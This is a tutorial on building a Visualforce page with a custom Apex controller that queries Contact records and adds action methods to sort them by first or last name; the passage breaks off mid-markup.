goals, we would >> have had a different set of rules. > > Yes, cross-platform portability is very important. But the > portability is not for the "generic schema-blind YAML tools" > but for real cross-platform applications. I do not think the > schema-blind tools are so important. I rather want YAML to > be more useful to the real applications. > > In addition, you are still talking about an ideal portability. > I give an example, where a schema-blind tool can not evaluate > nodes' equality correctly. > > - !People > - &A { name: Mike } > (snip) > - !Cats > - &a { name: Mike } > (snip) > - !Favorites > *A: beaf steak > *a: canned tuna > (snip) > > Schema-blind tool will think *A and *a are equal objects. > However, it is allowed in the YAML spec to give different > tags to the two nodes implicitly. Here, I assume !Person tag > to *A and !Cat tag to *a. So, these two nodes are not equal > to each other. The !Favorites mapping is valid, containing > no duplicated keys. > > * "Mike" is a popular cat's name in Japan. It means three-color > hair. The pronunciation is something like "meekwe". > > >> IMO, the main purpose of defining the semantics in YAML spec is to >> make the YAML file readable by human eyes. If we can believe the >> order of mapping keys is always neglected by the YAML processor, it >> becomes easier to understand the meaning of the data model and to >> hand-write a YAML file. >> >> >> I think you are biased here; PHP developers would disagree :-) > > No, I don't think so. > > 1. Specifying the data model in this case clarifies the meaning > of the document: "the key order does not matter." > > 2. In the majority of applications, the order of the a hash object > is meaningless, even in PHP applications. > > I don't think PHP people disagree with me at these points. At the > same time, I don't think it is a bad idea for PHP people to store > their ordered-hash objects in YAML mapping nodes, unless the key > order is indeed the concern of the specific application. Only when > the key order really matters, they should store the data in a !!omap > node to clarify the meaning of the data. > > > On the other hand, I do not think people will be too much confused by > seeing looks-like-duplicated keys in a mapping node. At first, when > such a YAML file is really meaningful in an application, people will > understand the right meaning of the data from the schema implicitly or > explicitly. Secondly, many real applications are making use of hash > objects that can contain multiple objects with same property values. > Thirdly, nobody will regret to see such a data file can not be > processed correctly in some platform that has nothing to do with the > specific application. > > >> So, I do not like to define the must-be-rejected mapping as you >> proposed because it does not seem to make YAML files much more >> readable. I think it is more benefitial to remov the constraint and >> to increase the adaptablity of YAML language to more applications. >> >> >> Readability is YAML's first and foremost goal. However, I don't see how >> saying that { a: 1, a: 2 } may be legal in some applications and illegal >> in some other applications increases readability. I find it to be >> confusing and that it decreases readability; that is, I can no longer >> tell just by looking at a YAML file whether it is valid or not, or what >> it means if it is valid. > > I think the required "readability" to YAML is not for distinguishing > validity of a file but for understanding the meaning of the data. > > Regarding the equality of collection nodes, I think people can easily > see the meaning of the YAML documents in my two examples. > Looks-like-duplicated keys do not prevent our understanding, > unless we worry if it is allowed in YAML spec or not. > > Regarding the mapping node with really duplicated keys, I have not > reached my conclusion. I just wanted to remind a related issue that > might affect the discussion. Note that JSON does not forbid duplicated > keys in a mapping node. Note that if we allow duplicated keys, the equality > of nodes loose all its meaning in YAML spec. We will not have to discuss > anything about it. > > >> 1. Expand the definition of scalar tags to specify a list of other >> "potentially equal" tags. Values of the defined tag are considered equal >> to values of the listed tags, if and only if their canonical form is >> identical. This would cover the !!int 1 and !!float 1.0 case. >> >> It would even cover the case of !!int 1 == !!str 1 if we list !!str as >> potentially equal to !!int, to accomodate Javascript and any other >> feebly-typed language out there. I think this is something we can live >> with (we'll definitely blame Javascript for it in the spec :-). > > For me, this seems too much. A short warning will be enough. > "Note that some languages have unique definitions for equality. > For example, !!int 1 and !!str "1" are equal mapping keys in > JavaScript." > > BTW, this issue might be the reason why JSON does not forbid > duplicated keys in a mapping node. > > >> 2. For collection tags - a mapping tag could specify its values are >> "potentially equal" to values of another mapping tag, if the values >> associated with some set of keys are equal. Thus, for example, an !!omap >> would be equal to a !!map if all the values for all the keys are equal >> between the two. An value of an Employee tag could be equal to a value >> of a Supervisor if their FirstName and LastName keys are equal, and so on. > > I did not see what was the point in this description. > Did you want to say that collection nodes with different tags may be > equal to each other when they have the same child nodes? > > I do not see why you suddenly says this. Could you please give some > use cases to see the meaning? I could not imagine anyone wants to > evaluate !!omap node and !!map node are equal *as mapping keys*. > The !Employee and !Supervisor example did not seem natural, neither. > > >> This does not address Osamu's identity vs. value based equality issue >> for collections. I view this as a completely orthogonal issue. It is one >> we discussed at length at the time (years back); in a nutshell, since >> YAML is a data serialization language, and since value-based semantics >> are a subset of identity based semantics (that is, value-based data >> works in identity based systems, but not the other way around), I feel >> that we made the right call. Changing this would be a much deeper >> modification than the above suggested tweak to the equality rules. That >> is, IMO changing this would be a YAML 1.3 or even a YAML 2.0 issue. > > Our difference is that you want to keep an arbitrary YAML file to > be acceptable to every implementation but I don't. Repeatedly, > I will not regret to see a valid YAML file can not be processed > correctly in some platform that has nothing to do with the > specific application. I guess not a few people think so. > > BTW, I wonder if value-based platforms can process self-containing > collection nodes in a *valid* YAML document. > > - &A [ *A ] > - &B [ *A ] > - { *A: 1, *B: 2 } > > Identity-based platform will accept this input because *A and *B > can be evaluated unequal. Can any value-based platform process > this correctly? > >@... > >
http://sourceforge.net/p/yaml/mailman/yaml-core/?viewmonth=200912&style=flat
CC-MAIN-2015-48
refinedweb
4,257
66.33
Difference between revisions of "EclipseLink/UserGuide/JPA/Basic JPA Development/Caching/Indexes" Revision as of 09:42, 24 May 2012 EclipseLink JPA Key API Native API Cache Indexes The EclipseLink cache is indexed by the entities Id. This allows the find() operation, relationships, and queries by Id to obtain cache hits and avoid database access. The cache is not used by default for any non-Id query. All non-Id queries will access the database then resolve with the cache for each row returned in the result-set. Applications tend to have other unique keys in their model in addition to their Id. This is quite common when a generated Id is used. The application frequently queries on these unique keys, and it is desirable to be able to obtain cache hits to avoid database access on these queries. Cache indexes allow an in-memory index to be created in the EclipseLink cache to allow cache hits on non-Id fields. The cache index can be on a single field, or on a set of fields. The indexed fields can be updateable, and although they should be unique, this is not a requirement. Queries that contain the indexed fields will be able to obtain cache hits. Only single results can be obtained from indexed queries. Cache indexes can be configured using the @CacheIndex and @CacheIndexes annotations and <cache-index> XML element. A @CacheIndex can be defined on the entity, or on an attribute to index the attribute. Indexes defined on the entity must define the columnNames used for the index. An index can be configured to be re-indexed when the object is updated using the updateable attribute. It is still possible to cache query results for non-indexed queries using the query result cache, (see Query Results Cache). Cache index annotation example ... @Entity @CacheIndex(columnNames={"F_NAME", "L_NAME", updateable=true) public class Employee { @Id private long id; @CacheIndex private String ssn; @Column(name="F_NAME") private String firstName; @Column(name="L_NAME") private String lastName; } Cache index XML example <?xml version="1.0"?> <entity-mappings <entity name="Employee" class="org.acme.Employee" access="FIELD"> <cache-index <column-name>F_NAME</column-name> <column-name>L_NAME</column-name> </cache-index> <attributes> <id name="id"/> <basic name="ssn"> <cache-index/> </basic> <basic name="firstName"> <column name="F_NAME"/> </basic> <basic name="lastName"> <column name="L_NAME"/> </basic> </attributes> </entity> </entity-mappings>
http://wiki.eclipse.org/index.php?title=EclipseLink/UserGuide/JPA/Basic_JPA_Development/Caching/Indexes&diff=303267&oldid=303266
CC-MAIN-2018-05
refinedweb
394
54.73
CL_SoundBuffer_Session provides control over a playing soundeffect. More... #include <soundbuffer_session.h> CL_SoundBuffer_Session provides control over a playing soundeffect. Whenever a soundbuffer is played, it returns a CL_SoundBuffer_Session class, which can be used to control the sound (its volume, pitch, pan, position). It can also be used to retrigger the sound or to stop it. Creates a null instance. Adds the sound filter to the session. See CL_SoundFilter for details. Returns the frequency of the session. Returns the total length (in samples) of the sound buffer played. Value returned will be -1 if the length is unknown (in case of non-static soundeffects like streamed sound) Returns whether this session loops. Returns the current pan (in a measure from -1 -> 1). -1 means the soundeffect is only playing in the left speaker, and 1 means the soundeffect is only playing in the right speaker. Returns the current sample position of the playback. Returns the sample position relative to the full length. The value returned will be between 0 and 1, where 0 means the session is at the beginning, and 1 means that the soundeffect has reached the end. Returns the linear relative volume of the soundeffect. 0 means the soundeffect is muted, 1 means the soundeffect is playing at "max" volume. Returns true if this object is invalid. Returns true if the session is playing. Starts playback of the session. Remove the sound filter from the session. See CL_SoundFilter for details. Sets the end position within the current stream. Sets the frequency of the session. Determines whether this session should loop. Sets the panning of the session played in measures from -1 -> 1. Setting the pan with a value of -1 will pan the session to the extreme left (left speaker only), 1 will pan the session to the extreme right (right speaker only). Sets the session position to 'new_pos'. Sets the relative position of the session. Value must be between 0 and 1, where 0 sets the session to the beginning, and 1 sets it to the end of the sound buffer. Sets the volume of the session in a relative measure (0->1). A value of 0 will effectively mute the sound (although it will still be sampled), and a value of 1 will set the volume to "max". Stops playback of the session. Throw an exception if this object is invalid.
http://gyan.fragnel.ac.in/docs/clanlib/classCL__SoundBuffer__Session.html
CC-MAIN-2019-09
refinedweb
394
68.26
. Exclusive beta information! Find out how to play Orion before anyone else! Release date being announced soon. Also brand new media from yesterdays private play test! Posted by Praz on Nov 9th, 2009 Hey guys! We're doing some continuous test. We know you were expecting a beta about a week ago, but if you haven't already read our ModDB post, our lead programmer had succumbed to PC hardware issues and we were out and delayed. However, in return (and thanks to the ModDB website) we were able to bring on two new programmers ('SteveUK' from Ham & Jam and 'FeareD'). Things are now progressing better than ever. I will say, however, we do have an official release date all set which I cannot yet announce. I will announce it as soon as I can! Also, if you want a chance to play Orion early just register on our forums! We will be accepting new beta testers every week! Register here: Orion-project.net Seeking Talent: We are currently looking for: Level Designers / 3D Artists / 2D Artists (level textures) *contact - david@prassel.com We have some great things lined up for the first release (before the years end). We also have some content that will be released shortly after! Until then, please enjoy some screen grabs from our private play test yesterday: Only registered members can share their thoughts. So come on! Join the community today (totally free) and do things you never thought possible. Good job so far. I can't wait! lol. Great pic's and also that stinks about the delay I can beta test. Unless you've already got a million demands (which you should. This looks like a kickass mod!) But yer, I'm avalable to beta test :) Nice. gj m8 do we get to play with Bots ???
http://www.moddb.com/mods/orion/news/orion-november-update
crawl-003
refinedweb
303
77.33
#include <testsuite.hh> Suite of tests. Running a group of test cases is best be done by adding each test case to a test suite. This suite does then the run and report of the whole group. Definition at line 38 of file testsuite.hh. Constructor. Definition at line 82 of file testsuite.hh. Disallowed. Adds a test suite to this test suite. Adds a test case to the suite of tests. Deletes the tests. Returns name of test suite. Definition at line 47 of file testsuite.hh. Returns number of failed tests. Returns number of passed tests. Returns output stream. Definition at line 53 of file testsuite.hh. Disallowed. Prints a report on the number of passed and failed tests in the whole suite to the output stream. Runs all test cases in the suite. Sets the output stream. Definition at line 55 of file testsuite.hh. Definition at line 71 of file testsuite.hh. Definition at line 72 of file testsuite.hh. Definition at line 73 of file testsuite.hh.
http://www.math.ethz.ch/~concepts/doxygen/html/classtest_1_1TestSuite.html
crawl-003
refinedweb
172
80.48
. Ruby versions (plus simple test cases) … Sort the numbers using a O(n log n) algorithm. Compare highest and lowest values in sorted list. If sum match target append to result list and delete both from sorted list If sum greater than target delete higher from sorted list If sum less than target delete lower from sorted list Continue until sorted list if empty or only one element is left. Another Ruby solution, took it a bit further so it supports more than just addition. Turns out Ruby has a builtin solution too. [1,2,3,4,5].combination(2).select { |a,b| a + b == 3 } Anyway this was a fun exercise. class Array def pairs_with_match( &block ) raise TypeError, ‘Error: list must be an array of integers.’ unless self.all? { |i| i.kind_of? Integer } results = self.each_with_object( [] ).with_index do |( current_number, result_array ), index| compare_array = self.drop(index) compare_array.each do |compare_number| result_array << [current_number, compare_number] if block.call( current_number, compare_number ) end end results.empty? ? "There were no matches." : results end end test = (1..100).each_with_object( [] ) { |i, result_array| result_array << i } puts "\nAddition:\n" print test.pairs_with_match { |a,b| a + b == 108 } puts "\n\nSubtraction\n" print test.pairs_with_match { |a,b| b – a == 14 } puts "\n\nMultiplication\n" print test.pairs_with_match { |a,b| a * b == 33 } puts "\n\nDivison\n" print test.pairs_with_match { |a,b| b.to_f / a.to_f == 13 } A quick scala solution: def findSums = (a:List[Int], b:List[Int], c:Int) => a.zip(b).filter(v => v._1 + v._2 == c My first Prolog program :) My first program on Haskell module Main where import System import Data.List {- Write a program that takes a list of integers and a target number and determines if any two integers in the list sum to the target number. If so, return the two numbers. If not, return an indication that no such integers exist. -} main = do (sNumber:sList) print "Nothing found" Just (x, pair) -> print $ "Yes, there's such an integer: " ++ (show pair) where determineIntegers :: Integer -> [Integer] -> Maybe (Integer, [Integer]) determineIntegers number list = find (\(x, pair) -> number == x) $ sumPairs pairs where pairs = filter (\x -> length(x) == 2) $ subsequences list sumPairs :: [[Integer]] -> [(Integer, [Integer])] sumPairs pairs = map (\x -> (head(x) + last(x), x)) pairs I figured that instead of adding two numbers “n” number of times. I could do 1 subtraction, and see if the remainder was in the list. Not sure how good of a solution this is, but it does seem to work. import Data.List import Data.Maybe sumCheck :: Int -> [Int] -> [Int] -> Maybe (Int, Int) sumCheck _ [] _ = Nothing sumCheck total (x:xs) ys = if total’ == Nothing then sumCheck total xs ys else return (x, (ys !! ( fromJust total’))) where total’ = (total – x) `elemIndex` ys Clojure FTW! %Erlang, the O(n) solution -module(my_module). -export([twosum/2]). twosum( Xs, Target) -> twosum( Xs, Target, dict:new() ). twosum( Xs, Target, Dict ) -> case Xs of [] -> no_sum; _ -> [ X | Tail ] = Xs, Diff = Target-X, case dict:is_key( Diff, Dict ) of true -> { Diff, X }; false -> twosum( Tail, Target, dict:store( X, X, Dict ) ) end end. In JavaScript with node.js: /** * Program that takes a list of integers and a target number and determines if * any two integers in the list sum to the target number. If so, return the two * numbers. If not, return an indication that no such integers exist. * * @see */ var App = function() { /** * Determines if any two integer in a given list sum to the target number. * @param list A list of integers. * @param target The target number. */ this.sum = function(list, target) { // Validate input. if (list == null || target == null) { throw 'Illegal arguments'; } if (list.length == null || list.length < 2) { throw 'Illegal arguments'; } var num1, num2; for (var i = 0; i < list.length; i++) { for (var j = 0; j < list.length; j++) { if (list[i] + list[j] == target && i != j) { num1 = list[i]; num2 = list[j]; break; } } if (num1 != null && num2 != null) { break; } } var results = []; if (num1 != null && num2 != null) { results = [num1, num2]; } return results; }; }; var list = [1,2,3,4,5,6,7,8,9]; var target = 18; var a = new App(); var result = a.sum(list, target); console.log(result); in JS it seems to work but some of the other solutions seem a lot longer than mine, am i doing something wrong? :) for(a = 0; a < numbers.length; a++) { for(b = 0; b < numbers.length; b++) { if(numbers[a] + numbers[b] == value) { if((a == b)) { } else { resulta = numbers[a]; resultb = numbers[b]; resulttest = true; document.write(resulta + " + " + resultb + " = " + value + " “); } } } } if(!resultTest) { document.write(“No results”); } forgot to include teh variables and array var numbers=[1,2,3,4,5,6,7,8,9,10,11,12]; var value = 15; var resultTest = false; var resulta,resultb; for(a = 0; a < numbers.length; a++) { for(b = 0; b < numbers.length; b++) { if(numbers[a] + numbers[b] == value) { if((a == b)) { } else { resulta = numbers[a]; resultb = numbers[b]; resulttest = true; document.write(resulta + " + " + resultb + " = " + value + " “); } } } } if(!resultTest) { document.write(“No results”); } […] try it out with a miniproject, perhaps from Programming Praxis. I went over there and found the Sum of Two Integers problem, which looked interesting. The problem is given a list of integers and a target integer […] My solution in Haskell: import Data.List(find) findSum :: Num a => a -> [a] -> Bool findSum s ns = find (sumIs s) (pairs ns) where sumIs :: Num a => a -> (a, a) -> Bool sumIs s (x, y) = x+y == s pairs :: [a] -> [(a, a)] pairs xs = pairs’ xs xs pairs’ :: [a] -> [a] -> [(a, a)] pairs’ [] _ = [] pairs’ (x:xs) (y:ys) = map (\y->(x,y)) ys ++ pairs’ xs ys #!/usr/bin/env python import sys from itertools import permutations def sum_of_ints(ints): ints_list = list(ints) perms = list(permutations(ints_list, 2)) list_new = [] for perm in perms: answer = int(perm[0]) + int(perm[1]) list_new.append(list((perm[0], perm[1], answer))) return list_new def match_target(list_new, target): for l in list_new: if l[2] != int(target): pass else: #In the brief we can return when we have a match no need to carry on return “hey look %s + %s match your target(%s)” % (l[0], l[1], target) return “Sorry no matches :-(” list_of_ints = sum_of_ints(sys.argv[1]) print match_target(list_of_ints, sys.argv[2]) Ok that makes no sense without formatting sumoftwo(List,Sum,X,Y) :- member(X,List), member(Y, List), Sum is X + Y. @anon: As I understand it, you’re not allowed to use the same number twice (unless it’s actually in the list twice). Your code might take the same number twice. @Per Persson – ouch! that’s what comes of trying to be clever. Revised version: sumoftwo(List,Sum,X,Y) :- select(X,List,Rest), member(Y,Rest), Sum is X + Y. my C++ version it’s got a lot of extra code in it because i wasn’t satisfied with the efficiency of my first attempt the only functions relating to the program are findPair() and/or SortFindPair(). I’m a beginner programmer. Constructive criticism and questions are wanted.
http://programmingpraxis.com/2011/07/19/sum-of-two-integers/?like=1&source=post_flair&_wpnonce=fb311db3f8
CC-MAIN-2015-40
refinedweb
1,162
66.74
the book data in the Cache object Checks the reference to ensure the data is still valid and reloads the data using the loadBookDataInCache method if it is not Returns a reference to the book data The second method ( loadBookDataInCache ) provides the ability to initially load the book data into the Cache . It performs the following operations: Reads the book data from the XML file into a DataSet Stores the DataTable in the DataSet in the Cache object When the DataTable in the DataSet is stored in the Cache object, three parameters are passed to the Insert method of the Cache object. The first parameter is the "key" value used to access the data in the cache. A constant is used here since the key value is needed in several places in the code. The second parameter is the DataTable containing the book data. The third parameter is the dependency on the XML file that was the original source of the data. By adding this dependency, the data is automatically removed from the cache anytime the XML file is changed. A DataTable is being stored in the Cache object instead of a DataSet because it uses less system resources and the extra functionality of a DataSet is not needed. context.Cache.Insert(CAC_BOOK_DATA, _ ds.Tables(BOOK_TABLE), _ New CacheDependency(xmlFilename)) context.Cache.Insert(CAC_BOOK_DATA, ds.Tables[BOOK_TABLE], new CacheDependency(xmlFilename)); The getBookData method is added to global.asax.vb (or global.asax.cs for C#) to provide access to the data stored in the Cache object with the appropriate checking to ensure the data is still valid and reloading it as required. The first step to retrieving the cached data is to get a reference to the book data in the Cache object: bookData = CType(context.Cache.Item(CAC_BOOK_DATA), _ DataTable) bookData = (DataTable)(context.Cache[CAC_BOOK_DATA]); Next , the reference must be checked to ensure the data is still valid and, if it is not, the data must be reloaded using the loadBookDataInCache method: If (IsNothing(bookdata)) Then 'data is not in the cache so load it bookData = loadBookDataInCache(context) End If if (bookData == null) { // data is not in the cache so load it bookData = loadBookDataInCache(context); } Finally, the book data is returned to the caller. The code shown in our example is designed to avoid a race condition that can result in a very difficult-to-find error. The race condition is best described by example. Assume the following code was used (VB code shown): 1 If (IsNothing(context.Cache.Item(CAC_BOOK_DATA)) then 2 loadBookDataInCache(context) 3 End If 4 bookData = Ctype(context.Cache.Item(CAC_BOOK_DATA), _ DataTable) The code shown on line 1 checks to see if the book data exists in the cache, but it does not retrieve the data. If the data was valid, the next line of code that would execute would be line 4. If the dependency caused the data to be removed from the cache between the execution of lines 1 and 4, a null reference exception would be thrown at line 4. because the data is no longer in the cache. This example precludes the problem by retrieving the data as the first step then checks to see if the data is valid. Because you already have a copy of the data, you do not care if the data is removed from the cache. Likewise, the loadBookDataInCache method returns the data to avoid the same race condition problem. The caching object provides many additional features not described in our example, including the ability to replace the data based on a specified time and the ability to have one object in the cache be dependent on another object in the cache. For more information on these topics, refer to the MSDN documentation on the Cache and CacheDependency objects. One dependency that is not provided is the ability to replace the data when data in a database changes. A workaround is to write the data to an XML document when the application starts, and then use the approach shown in this example. When an operation changes the data in the database, the XML document can be regenerated, which will cause the data to be removed from the cache and then reloaded when it is needed the next time. MSDN documentation on the Cache and CacheDependency objects Option Explicit On Option Strict On '----------------------------------------------------------------------------- ' ' Module Name: Global.asax.vb ' ' Description: This module provides the code behind for the ' Global.asax page ' '***************************************************************************** Imports Microsoft.VisualBasic Imports System Imports System.Configuration Imports System.Data Imports System.Data.OleDb Imports System.Diagnostics Imports System.Web Imports System.Web.Caching Namespace ASPNetCookbook.VBExamples Public Class Global Inherits System.Web.HttpApplication 'the following constant used to define the name of the variable used to 'store the book data in the cache object Private Const CAC_BOOK_DATA As String = "BookData" '************************************************************************* ' ' ROUTINE: loadBookDataInCache ' ' DESCRIPTION: This routine reads the book data from an XML file and ' places it in the cache object. '------------------------------------------------------------------------- Private Shared Function loadBookDataInCache(ByVal context As HttpContext) _ As DataTable Const BOOK_TABLE As String = "Book" Dim xmlFilename As String Dim ds As DataSet )) End Function 'loadBookDataInCache '************************************************************************* ' ' ROUTINE: loadBookDataInCache ' ' DESCRIPTION: This routine gets the book data from cache and reloads ' the cache if required. '------------------------------------------------------------------------- Public Shared Function getBookData(ByVal context As HttpContext) _ As DataTable Dim bookData As DataTable 'get the book data from the cache bookData = CType(context.Cache.Item(CAC_BOOK_DATA), _ DataTable) 'make sure the data is valid If (IsNothing(bookData)) Then 'data is not in the cache so load it bookData = loadBookDataInCache(context) End If Return (bookData) End Function 'getBookData End Class 'Global End Namespace //---------------------------------------------------------------------------- // // Module Name: Global.asax.cs // // Description: This module provides the code behind for the // Global.asax page // //**************************************************************************** using System; using System.Configuration; using System.Data; using System.Data.OleDb; using System.Diagnostics; using System.Web; using System.Web.Caching; namespace ASPNetCookbook.CSExamples { public class Global : System.Web.HttpApplication { // the following constant used to define the name of the variable used to // store the book data in the cache object private const String CAC_BOOK_DATA = "BookData"; //************************************************************************ // // ROUTINE: loadBookDataInCache // // DESCRIPTION: This routine reads the book data from an XML file and // places it in the cache object. //------------------------------------------------------------------------ private static DataTable loadBookDataInCache(HttpContext context) { const String BOOK_TABLE = "Book"; String xmlFilename = null; DataSet ds = null; //]); } // loadBookDataInCache //************************************************************************ // // ROUTINE: getBookData // // DESCRIPTION: This routine gets the book data from cache and reloads // the cache if required. //------------------------------------------------------------------------ public static DataTable getBookData(HttpContext context) { DataTable bookData = null; // get the book data from the cache bookData = (DataTable)(context.Cache[CAC_BOOK_DATA]); // make sure the data is valid if (bookData == null) { // data is not in the cache so load it bookData = loadBookDataInCache(context); } return (bookData); } // getBookData } // Global }
https://flylib.com/books/en/1.506.1.123/1/
CC-MAIN-2019-39
refinedweb
1,109
54.02
CodePlexProject Hosting for Open Source Software I'm playing around with my first module that needs admin pages, and can't seem to get the AdminController for it to behave. I have: [ValidateInput(true)] public class AdminController : Controller { public AdminController(IContentManager contentManager) { _contentManager = contentManager; } private IContentManager _contentManager; public ActionResult Index() { // Create the viewmodel ModViewModel model = new ModViewModel(); return View(model); } } public class AdminMenu : INavigationProvider { public string MenuName { get { return "admin"; } } public AdminMenu() { T = NullLocalizer.Instance; } private Localizer T { get; set; } public void GetNavigation(NavigationBuilder builder) { builder .AddImageSet("reports") .Add(T("Testing"), "2", menu => menu.Action("Index", "Admin", new { area = "Mod" }) .Permission(StandardPermissions.AccessAdminPanel) .Add(T("Function 1"), "0", item => item.Action("Index", "Admin", new { area = "Mod" }).Permission(StandardPermissions.AccessAdminPanel)) ); } } = 11, Route = new Route( "Admin/Mod", new RouteValueDictionary { {"area", "Mod"}, {"controller", "Admin"}, {"action", "Index"} }, new RouteValueDictionary(), new RouteValueDictionary { {"area", "Mod"} }, new MvcRouteHandler()) } }; } } So far so good. But, when you try and hit I get a 404 page (The resource cannot be found). I have tried enabling the debug logging, but nothing relevant appears here. Putting a breakpoint in the controller seems to indicate that the controller is not being "found" and created by Orchard - but for the life of me I can't work out why. Any pointers? Andy Does your action get hit when you navigate to it directly? E.g. if your module project is called Mod, then try navigating to: If that works, then it's the routing that doesn't work for some reason. You may simply have to reset your application though (save web.config). This worked for me a few days ago when I was having a similar issue. Hi sfmskywalker, Thanks for the reply - unfortunatly if I try and hit the module directly (either with or) I get the Orchard 404 page (Not Found) - i.e. no error page like what I get when hitting I'm guessing because the routing only explicitly handles the latter case, and not the former (with actions). Follow up, I've just used Route Debugger and confirmed that my Admin/Mod route is being used for - but for some reason, I still end up with the 404? Perhaps Orchard is unable to find the controller or the view for some reason? Hmm.. and you're sure that the Index view is there in the Views/Admin folder? sfmskywalker wrote: Hmm.. and you're sure that the Index view is there in the Views/Admin folder? Sorry, you mentioned that, I overlooked it. I just built a module with exactly your code, there is nothing wrong with it as far as I can tell. Did you check that the module is enabled (from the Modules section)? Yup, its enabled. I'm going to have a shot at building a new module, with nothing but the basics (hello world on everything), just to see if I can reproduce this problem - if I can, I'll post it on here when done :) It's got me completely stumped! seems a little bit out of place. Did you setup a host name "orchardlocal"? Or did you mean:? orchardlocal is setup as a local hostname (to make life easier). I've created a clean, very very very basic module - and put the code I'm using in for the admin bits. It has the same issue. Any chance you can take a look and see if I'm being a fool? I'm using Orchard 1.5.1 Just tested it, works like a charm. Could you try changing Orchard.Web to using the built-in web server Cassini or IIS Express? Or even better: start a clean install of Orchard, and test your module from there, just to see that the module does work. Perhaps there's something wrong with your IIS config or web.config of your Orchard install. Really odd - tried it on a different machine (same project etc) and it appears fine. So. I wiped the project folder out on my machine, cleared Temp ASP.NET files, and refetched the project from source control. And hit F5. Same problem. Tried both Cassini and IIS Express 7.5 - all the same That's really strange, since other modules like Blogs do work fine on your machine? Yup, other modules work as expected. It's got to be something cached somewhere, but I havent a clue where. Tried uninstalling / reininstalling IIS Express, no change. I'm due to format the machine, but its a curiosity thats annoying me! I had a similar situation getting error 404 for controllers/views that existed. I narrowed it down to the fact that the files were added outside Visual Studio (i.e. Windows Explorer or Web Matrix) and the module.csproj did not have them included in the files to be compiled. Try opening csproj file in visual studio, and click the Show All File in the Solution Explorer pane. Locate ALL files (controller, views, models, view models, admin.cs, etc.), right click and click Include In Project. Save and close VS -- DO NOT Build the project. After spending 4 days to understand this issue on a module of mine I got the is for some reason view fails load orchard silently excludes it. I narrowed down replacing my view with a very simple one containing only: @model dynamic Hello world then it loaded and worked. After that I have replaced content with my previous view and got the error (please note, do not swpa files, replace content... this does not dynamically compiles the view again... hopefully) At that point my view loaded with an error. My bet is that at some point deep in orchard code there is a code that tries to load the view and silently does a 404 if any error occours and not just if the view is not there. I thing this is a BUG IMHO because nothing is logged and one has no clue that view throws an error, the 404 is just misleading.... ps: my orchard is 1.5 best regards, wonderful product anyway, I love it! If you can provide repro steps, please file a bug. Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
http://orchard.codeplex.com/discussions/389537
CC-MAIN-2017-09
refinedweb
1,056
66.03
Create & Use Custom Controllers Learning Objectives Introduction to Custom Controllers Elsewhere you were introduced to how Visualforce supports the Model–View–Controller (MVC) design pattern for building web apps. Controllers typically retrieve the data to be displayed in a Visualforce page, and contain code that executes in response to page actions, such as a button being clicked. When you use the standard controller, a great deal of, well, standard functionality is provided for you by the platform. But one size does not fit all, and not all web apps are “standard.” When you want to override existing functionality, customize the navigation through an application, use callouts or Web services, or if you need finer control for how information is accessed for your page, Visualforce lets you take the reigns. You can write a custom controller using Apex and completely control your app’s logic from start to finish. Create a Visualforce Page that Uses a Custom Controller When your page uses a custom controller, you can’t use a standard controller. Pages use a different attribute to set the custom controller. - Open the Developer Console and click to create a new Visualforce page. Enter ContactsListController for the page name. - In the editor, replace any markup with the following. <apex:page <apex:form> <apex:pageBlock <!-- Contacts List goes here --> </apex:pageBlock> </apex:form> </apex:page>When you try to save this page, you’ll get an error, because ContactsListController doesn’t exist yet. No worries, we’ll fix that next. Create a Custom Controller Apex Class There are a lot of system and utility classes to help you write custom controller logic, but the only requirement for a class to be used as a custom controller is that it exists. - Open the Developer Console and click to create a new Apex class. Enter ContactsListController for the class name. - In the editor, replace any code with the following.As with Visualforce pages, you need to save your changes to Apex when you change it. public class ContactsListController { // Controller code goes here }It’s not much, and it doesn’t do anything yet, but it does make the error go away on the Visualforce page. So… - Switch back to the Visualforce page and save it again.The error message should go away, and the page is saved successfully. - Click Preview to open a preview of your page that you can look at while you make changes.A new window should open, showing the standard Salesforce page header and sidebar elements, but no content yet. At first glance, these two new items you’ve created don’t seem very interesting. But even though they are 90% placeholder code, the two items—Visualforce page and Apex controller—are linked to each other. As soon as you add some more code to the controller your page will be able to use it. Beyond the Basics You might have noticed that this custom controller class doesn’t inherit from another class, nor does it implement an interface promising to conform to the requirements of a Visualforce controller. Even complex controllers don’t do these things, because there isn’t any such class to inherit from or interface to implement. This leaves you free to create your own classes and interfaces as your experience with Apex increases. Add a Method to Retrieve Records The primary purpose of most controllers is to retrieve data for display, or handle updates to data. In this simple controller, all you need to do is run a basic SOQL query that finds contact records, and then make those records available to the Visualforce page. - In the ContactsListController class, replace the // Controller code goes here comment line with the following code. private String sortOrder = 'LastName'; public List<Contact> getContacts() { List<Contact> results = Database.query( 'SELECT Id, FirstName, LastName, Title, Email ' + 'FROM Contact ' + 'ORDER BY ' + sortOrder + ' ASC ' + 'LIMIT 10' ); return results; }This code adds one private member variable, a string named sortOrder, and one public method, getContacts(). sortOrder is pretty easy to understand, it’s just the name of the field to sort the contacts by. getContacts() is also fairly simple, but if you haven’t seen Apex before, it might be hard to parse at first. The effect of the method is to perform a SOQL query to get a list of contact records, and then return that list of contacts to the method caller. And who will the caller be? The Visualforce page, of course! - In the ContactsListWithController page, replace the <!-- Contacts List goes here --> comment line with the following markup. <!-- Contacts List --> <apex:pageBlockTable <apex:column <apex:column <apex:column <apex:column </apex:pageBlockTable>When you save this page you should see a familiar looking table of contact information. The markup for the ContactsListWithController page should look fairly familiar. Except for the controller attribute of the <apex:page> tag, it’s pretty much the same code you would use to create the page with the standard controller. What’s different is what happens when the {! contacts } expression is evaluated. On this page, Visualforce translates that expression into a call to your controller’s getContacts() method. That method returns a list of contact records, which is exactly what the <apex:pageBlockTable> is expecting. The getContacts() method is called a getter method, and it’s a general pattern, where {! someExpression } in your Visualforce markup automatically connects to a method named getSomeExpression() in your controller. This is the simplest way for your page to get access to the data it needs to display. Add a New Action Method Showing data is great, but responding to user actions is essential to any web app. With a custom controller, you can create as many custom actions as you want to support on a page, by writing action methods to respond to user activity. - In the ContactsListController class, below the getContacts() method, add the following two methods. public void sortByLastName() { this.sortOrder = 'LastName'; } public void sortByFirstName() { this.sortOrder = 'FirstName'; }These two methods change the value of the sortOrder private variable. sortOrder is used in the SOQL query that retrieves the contacts, and changing sortOrder will change the order of the results. - In the ContactsListWithController page, replace the two <apex:column> tags for ct.FirstName and ct.LastName with the following markup. <apex:column <apex:facet <apex:commandLinkFirst Name </apex:commandLink> </apex:facet> </apex:column> <apex:column <apex:facet 